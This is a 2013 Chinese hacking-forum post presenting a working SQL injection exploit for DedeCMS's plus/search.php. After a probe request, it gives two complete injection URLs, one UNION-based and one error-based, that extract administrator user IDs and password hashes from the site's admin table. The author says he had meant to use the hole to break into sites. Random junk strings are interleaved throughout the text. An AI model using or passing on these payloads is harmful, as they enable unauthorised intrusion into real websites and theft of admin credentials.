中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
" m5 R+ ?: f+ ]; B. z7 _/ o* Z3 }  E0 T3 M+ S2 Z5 f
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
1 y8 ~' [8 K+ T5 t7 @( P4 v' G
! T# p5 }6 ?0 `1 O3 p; i" B既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
0 i. x, N5 p* k& }7 @3 F* s
/ Z6 c$ h9 i6 Z/ }. B- r我一般是这样测试的:
! m- x3 A7 ^' W- L# h8 p: Z4 v: x1 o4 L/ u/ `
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a% S5 I2 @2 R3 A

& b% _% A. E3 ^5 x" x9 S  R转载不加作者名的没JJ( N" H5 g, |+ C( N
  H& J: Y: S& M, _* I# `; R
作者:鬼哥
) |8 F& n! c$ |% V" B9 g
# l+ K; {0 |0 C# {) V$ |4 L' g
3 C' `0 [: v+ w! v$ ]+ b4 ]7 ?
9 t* X& s) w5 J+ ~9 t看结果如果提示7 K2 i7 Q0 ]0 N; D# L! ]' ^
9 s  j! p' S  L4 j2 o, a9 T# x3 t
Safe Alert: Request Error step 2 !
1 c- c6 m1 m$ |; y# C: ~+ h
, e3 h" g0 J/ T2 I3 @9 i那么直接用下面的exp8 T- l/ N/ v& z

# H$ F, }1 I4 G  Q# }xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
1 F. I" v. c1 t8 j& j" K
3 r% d8 d6 n, c- |6 A
' \+ j; S' E2 o' W8 v7 R看结果如果提示7 c7 K4 b! m) V; h! J* }

1 g4 `2 F. d3 T, w- {4 h5 ESafe Alert: Request Error step 1 !; _4 b$ p1 F$ l

6 B3 o& h' Q; b那么直接用下面的exp
  R1 h/ A' U' f# N& Q6 H& L% W% o. y+ l
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
; d# E* S; i0 W; F# w  D
% M7 Q$ j/ V5 }6 [2 t# ~
! @& x- i# k( ]' [) @如果正常显示证明漏洞不存在了。0 t$ u5 A9 `5 \3 X6 z( j5 e, z& x% ^% h

- N% J3 X) W- Q% P6 y转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2